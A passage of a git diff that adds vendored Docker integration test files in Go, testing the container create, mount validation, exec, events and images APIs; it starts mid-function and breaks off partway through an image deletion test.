"/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + // decode only one object from the stream + var s *types.Stats + dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + c.Assert(dec.Decode(&s), checker.IsNil) + } +} + +func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { + type m mounttypes.Mount + type hc struct{ Mounts []m } + type cfg struct { + Image string + HostConfig hc + } + type testCase struct { + config cfg + status int + msg string + } + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + notExistPath := prefix + slash + "notexist" + + cases := []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "notreal", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "mount type unknown", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind"}}}}, + status: http.StatusBadRequest, + msg: "Target must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "Source must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: notExistPath, + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "bind source path does not exist", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume"}}}}, + status: http.StatusBadRequest, + msg: "Target must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume", + Source: "hello", + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume", + Source: "hello2", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local"}}}}}}, + status: http.StatusCreated, + msg: "", + }, + } + + if SameHostDaemon.Condition() { + tmpDir, err := ioutils.TempDir("", "test-mounts-api") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + cases = append(cases, []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: tmpDir, + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: tmpDir, + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{}}}}}, + status: http.StatusBadRequest, + msg: "VolumeOptions must not be specified", + }, + }...) + } + + if DaemonIsLinux.Condition() { + cases = append(cases, []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume", + Source: "hello3", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local", + Options: map[string]string{"o": "size=1"}}}}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Target: destPath, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, + Mode: 0700, + }}}}}, + status: http.StatusCreated, + msg: "", + }, + + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Source: "/shouldnotbespecified", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "Source must not be specified", + }, + }...) + + } + + for i, x := range cases { + c.Logf("case %d", i) + status, b, err := sockRequest("POST", "/containers/create", x.config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config)) + if len(x.msg) > 0 { + c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + } + } +} + +func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) { + testRequires(c, NotUserNamespace, SameHostDaemon) + // also with data in the host side + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + tmpDir, err := ioutil.TempDir("", "test-mounts-api-bind") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666) + c.Assert(err, checker.IsNil) + + data := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "cat /foo/bar"}, + "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": destPath}}}, + } + status, resp, err := sockRequest("POST", "/containers/create?name=test", data) + c.Assert(err, checker.IsNil, check.Commentf(string(resp))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + + out, _ := dockerCmd(c, "start", "-a", "test") + c.Assert(out, checker.Equals, "hello") +} + +// Test Mounts comes out as expected for the MountPoint +func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + + var ( + err error + testImg string + ) + if daemonPlatform != "windows" { + testImg, err = buildImage("test-mount-config", ` + FROM busybox + RUN mkdir `+destPath+` && touch `+destPath+slash+`bar + CMD cat `+destPath+slash+`bar + `, true) + } else { + testImg = "busybox" + } + c.Assert(err, checker.IsNil) + + type testCase struct { + cfg mounttypes.Mount + expected types.MountPoint + } + + cases := []testCase{ + // use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest + // Validation of the actual `Mount` struct is done in another test is not needed here + {mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}}, + } + + if SameHostDaemon.Condition() { + // setup temp dir for testing binds + tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir1) + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}}, + }...) + + // for modes only supported on Linux + if DaemonIsLinux.Condition() { + tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir3) + + c.Assert(mount.Mount(tmpDir3, tmpDir3, "none", "bind,rw"), checker.IsNil) + c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil) + + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}}, + }...) + } + } + + if daemonPlatform != "windows" { // Windows does not support volume populate + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}}, + }...) + } + + type wrapper struct { + containertypes.Config + HostConfig containertypes.HostConfig + } + type createResp struct { + ID string `json:"Id"` + } + for i, x := range cases { + c.Logf("case %d - config: %v", i, x.cfg) + status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}}) + c.Assert(err, checker.IsNil, check.Commentf(string(data))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data))) + + var resp createResp + err = json.Unmarshal(data, &resp) + c.Assert(err, checker.IsNil, check.Commentf(string(data))) + id := resp.ID + + var mps []types.MountPoint + err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps) + c.Assert(err, checker.IsNil) + c.Assert(mps, checker.HasLen, 1) + c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination) + + if len(x.expected.Source) > 0 { + c.Assert(mps[0].Source, checker.Equals, x.expected.Source) + } + if len(x.expected.Name) > 0 { + c.Assert(mps[0].Name, checker.Equals, x.expected.Name) + } + if len(x.expected.Driver) > 0 { + c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver) + } + c.Assert(mps[0].RW, checker.Equals, x.expected.RW) + c.Assert(mps[0].Type, checker.Equals, x.expected.Type) + c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode) + if len(x.expected.Propagation) > 0 { + c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation) + } + + out, _, err := dockerCmdWithError("start", "-a", id) + if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" { + c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0])) + } else { + c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0])) + } + + dockerCmd(c, "rm", "-fv", id) + if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 { + // This should still exist even though we removed the container + dockerCmd(c, "volume", "inspect", mps[0].Name) + } else { + // This should be removed automatically when we removed the container + out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + } + } +} + +func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) { + testRequires(c, DaemonIsLinux) + type testCase struct { + cfg map[string]interface{} + expectedOptions []string + } + target := "/foo" + cases := []testCase{ + { + cfg: map[string]interface{}{ + "Type": "tmpfs", + "Target": target}, + expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"}, + }, + { + cfg: map[string]interface{}{ + "Type": "tmpfs", + "Target": target, + "TmpfsOptions": map[string]interface{}{ + "SizeBytes": 4096 * 1024, "Mode": 0700}}, + expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"}, + }, + } + + for i, x := range cases { + cName := fmt.Sprintf("test-tmpfs-%d", i) + data := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", + fmt.Sprintf("mount | grep 'tmpfs on %s'", target)}, + "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}}, + } + status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data) + c.Assert(err, checker.IsNil, check.Commentf(string(resp))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + out, _ := dockerCmd(c, "start", "-a", cName) + for _, option := range x.expectedOptions { + c.Assert(out, checker.Contains, option) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go new file mode 100644 index 0000000000..41011c3157 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go @@ -0,0 +1,84 @@ +package main + +import ( + "net/http" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) { + name := "test" + config := map[string]interface{}{ + "Image": "test456:v1", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected := "No such image: test456:v1" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + config2 := map[string]interface{}{ + "Image": "test456", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, body, err = sockRequest("POST", "/containers/create?name="+name, config2) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected = "No such image: test456:latest" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + + config3 := map[string]interface{}{ + "Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + } + + status, body, err = sockRequest("POST", "/containers/create?name="+name, config3) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + +} + +// Test for #25099 +func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) { + name := "test1" + config := map[string]interface{}{ + "Image": "busybox", + "Env": []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + + status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected := "invalid environment variable:" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + name = "test2" + config = map[string]interface{}{ + "Image": "busybox", + "Env": []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "invalid environment variable: =" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + name = "test3" + config = map[string]interface{}{ + "Image": "busybox", + "Env": []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "invalid environment variable: =foo" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go new file mode 100644 index 0000000000..3891c87379 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go @@ -0,0 +1,73 @@ +package main + +import ( + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) { + type apiResp struct { + resp *http.Response + err error + } + chResp := make(chan *apiResp) + go func() { + resp, body, err := sockRequestRaw("GET", "/events", nil, "") + body.Close() + chResp <- &apiResp{resp, err} + }() + + select { + case r := <-chResp: + c.Assert(r.err, checker.IsNil) + c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK) + case <-time.After(3 * time.Second): + c.Fatal("timeout waiting for events api to respond, should have responded immediately") + } +} + +func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) { + since := daemonTime(c).Unix() + ts := strconv.FormatInt(since, 10) + + out, _ := runSleepingContainer(c, "--name=foo", "-d") + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + q := url.Values{} + q.Set("since", ts) + + _, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + + dec := json.NewDecoder(body) + var containerCreateEvent *jsonmessage.JSONMessage + for { + var event jsonmessage.JSONMessage + if err := dec.Decode(&event); err != nil { + if err == io.EOF { + break + } + c.Fatal(err) + } + if event.Status == "create" && event.ID == containerID { + containerCreateEvent = &event + break + } + } + + c.Assert(containerCreateEvent, checker.Not(checker.IsNil)) + c.Assert(containerCreateEvent.Status, checker.Equals, "create") + c.Assert(containerCreateEvent.ID, checker.Equals, containerID) + c.Assert(containerCreateEvent.From, checker.Equals, "busybox") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go new file mode 100644 index 0000000000..cf4dded483 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go @@ -0,0 +1,103 @@ +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "net/http" + "strings" + "sync" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) +} + +// Part of #14845 +func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { + name := "exec_resize_test" + dockerCmd(c, "run", "-d", "-i", "-t", "--name", name, "--restart", "always", "busybox", "/bin/sh") + + testExecResize := func() error { + data := map[string]interface{}{ + "AttachStdin": true, + "Cmd": []string{"/bin/sh"}, + } + uri := fmt.Sprintf("/containers/%s/exec", name) + status, body, err := sockRequest("POST", uri, data) + if err != nil { + return err + } + if status != http.StatusCreated { + return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status) + } + + out := map[string]string{} + err = json.Unmarshal(body, &out) + if err != nil { + return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error()) + } + + execID := out["Id"] + if len(execID) < 1 { + return fmt.Errorf("ExecCreate got invalid execID") + } + + payload := bytes.NewBufferString(`{"Tty":true}`) + conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json") + if err != nil { + return fmt.Errorf("Failed to start the exec: %q", err.Error()) + } + defer conn.Close() + + _, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain") + // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. + if err == io.ErrUnexpectedEOF { + return fmt.Errorf("The daemon might have crashed.") + } + + if err == nil { + rc.Close() + } + + // We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise. + return nil + } + + // The panic happens when daemon.ContainerExecStart is called but the + // container.Exec is not called. + // Because the panic is not 100% reproducible, we send the requests concurrently + // to increase the probability that the problem is triggered. + var ( + n = 10 + ch = make(chan error, n) + wg sync.WaitGroup + ) + for i := 0; i < n; i++ { + wg.Add(1) + go func() { + defer wg.Done() + if err := testExecResize(); err != nil { + ch <- err + } + }() + } + + wg.Wait() + select { + case err := <-ch: + c.Fatal(err.Error()) + default: + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go new file mode 100644 index 0000000000..716e9ac68f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go @@ -0,0 +1,198 @@ +// +build !test_no_exec + +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Regression test for #9414 +func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil}) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + comment := check.Commentf("Expected message when creating exec command with no Cmd specified") + c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment) +} + +func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(map[string]interface{}{"Cmd": nil}); err != nil { + c.Fatalf("Can not encode data to json %s", err) + } + + res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + + comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified") + c.Assert(getErrorMessage(c, b), checker.Contains, "Content-Type specified", comment) +} + +func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) { + // Not relevant on Windows as Windows containers cannot be paused + testRequires(c, DaemonIsLinux) + name := "exec_create_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + dockerCmd(c, "pause", name) + status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) + + comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name) + c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment) +} + +func (s *DockerSuite) TestExecAPIStart(c *check.C) { + testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI + dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + + id := createExec(c, "test") + startExec(c, id, http.StatusOK) + + var execJSON struct{ PID int } + inspectExec(c, id, &execJSON) + c.Assert(execJSON.PID, checker.GreaterThan, 1) + + id = createExec(c, "test") + dockerCmd(c, "stop", "test") + + startExec(c, id, http.StatusNotFound) + + dockerCmd(c, "start", "test") + startExec(c, id, http.StatusNotFound) + + // make sure exec is created before pausing + id = createExec(c, "test") + dockerCmd(c, "pause", "test") + startExec(c, id, http.StatusConflict) + dockerCmd(c, "unpause", "test") + startExec(c, id, http.StatusOK) +} + +func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + + id := createExec(c, "test") + resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "") +} + +func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + runSleepingContainer(c, "-d", "--name", "test") + id := createExec(c, "test") + + resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain") + c.Assert(err, checker.IsNil) + + b, err := readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment) +} + +// #19362 +func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { + runSleepingContainer(c, "-d", "--name", "test") + execID := createExec(c, "test") + startExec(c, execID, http.StatusOK) + + timeout := time.After(60 * time.Second) + var execJSON struct{ Running bool } + for { + select { + case <-timeout: + c.Fatal("timeout waiting for exec to start") + default: + } + + inspectExec(c, execID, &execJSON) + if !execJSON.Running { + break + } + } + + startExec(c, execID, http.StatusConflict) +} + +// #20638 +func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) { + name := "foo" + runSleepingContainer(c, "-d", "-t", "--name", name) + data := map[string]interface{}{ + "cmd": []string{"true"}, + "AttachStdin": true, + } + _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data) + c.Assert(err, checker.IsNil, check.Commentf(string(b))) + + createResp := struct { + ID string `json:"Id"` + }{} + c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + + _, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + + b, err = readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + + resp, _, err := sockRequestRaw("GET", "/_ping", nil, "") + c.Assert(err, checker.IsNil) + if resp.StatusCode != http.StatusOK { + c.Fatal("daemon is down, it should alive") + } +} + +func createExec(c *check.C, name string) string { + _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + c.Assert(err, checker.IsNil, check.Commentf(string(b))) + + createResp := struct { + ID string `json:"Id"` + }{} + c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + return createResp.ID +} + +func startExec(c *check.C, id string, code int) { + resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + + b, err := readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + c.Assert(resp.StatusCode, checker.Equals, code, comment) +} + +func inspectExec(c *check.C, id string, out interface{}) { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + err = json.NewDecoder(body).Decode(out) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go new file mode 100644 index 0000000000..b7617eae25 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go @@ -0,0 +1,165 @@ +package main + +import ( + "encoding/json" + "net/http" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { + name := "utest:tag1" + name2 := "utest/docker:tag2" + name3 := "utest:5000/docker:tag3" + for _, n := range []string{name, name2, name3} { + dockerCmd(c, "tag", "busybox", n) + } + type image types.ImageSummary + getImages := func(filter string) []image { + v := url.Values{} + v.Set("filter", filter) + status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var images []image + err = json.Unmarshal(b, &images) + c.Assert(err, checker.IsNil) + + return images + } + + //incorrect number of matches returned + images := getImages("utest*/*") + c.Assert(images[0].RepoTags, checker.HasLen, 2) + + images = getImages("utest") + c.Assert(images[0].RepoTags, checker.HasLen, 1) + + images = getImages("utest*") + c.Assert(images[0].RepoTags, checker.HasLen, 1) + + images = getImages("*5000*/*") + c.Assert(images[0].RepoTags, checker.HasLen, 1) +} + +func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) { + // TODO Windows to Windows CI: Investigate further why this test fails. + testRequires(c, Network) + testRequires(c, DaemonIsLinux) + out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + dockerCmd(c, "rmi", id) + + res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar") + c.Assert(err, checker.IsNil) + defer loadBody.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + inspectOut := inspectField(c, id, "Id") + c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly")) +} + +func (s *DockerSuite) TestAPIImagesDelete(c *check.C) { + if daemonPlatform != "windows" 